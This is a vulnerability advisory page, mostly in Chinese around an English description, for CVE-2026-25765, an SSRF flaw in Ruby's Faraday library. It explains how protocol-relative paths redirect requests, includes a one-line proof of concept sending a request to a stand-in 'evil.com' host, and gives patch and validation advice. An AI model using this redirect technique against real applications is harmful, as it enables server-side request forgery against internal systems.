CVE-2026-25765

描述

### Impact Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`) uses Ruby's `URI#merge` to combine the connection's base URL with a user-supplied path. Per RFC 3986, protocol-relative URLs (e.g. `//evil.com/path`) are treated as network-path references that override the base URL's host/authority component. This means that if any application passes user-controlled input to Faraday's `get()`, `post()`, `build_url()`, or other request methods, an attacker can supply a protocol-relative URL like `//attacker.com/endpoint` to redirect the request to an arbitrary host, enabling Server-Side Request Forgery (SSRF). The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with `/`, so protocol-relative URLs bypass it entirely. **Example:** ```ruby conn = Faraday.new(url: 'https://api.internal.com') conn.get('//evil.com/steal') # Request is sent to https://evil.com/steal instead of api.internal.com ``` ### Patches Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected. ### Workarounds **NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.** Applications should validate and sanitize any user-controlled input before passing it to Faraday request methods. Specifically: - Reject or strip input that starts with // followed by a non-/ character - Use an allowlist of permitted path prefixes - Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday Example validation: ```ruby def safe_path(user_input) raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]}) user_input end ```

如何修補 CVE-2026-25765

要修補 CVE-2026-25765,請將受影響套件升級到下列已修補版本。

• —未列出修補版本
• —升級至 2.14.1 或更新版本

CVE-2026-25765 正在被利用嗎?

低 — EPSS 為 0.0%,目前沒有觀察到大規模利用活動。

受影響套件(2)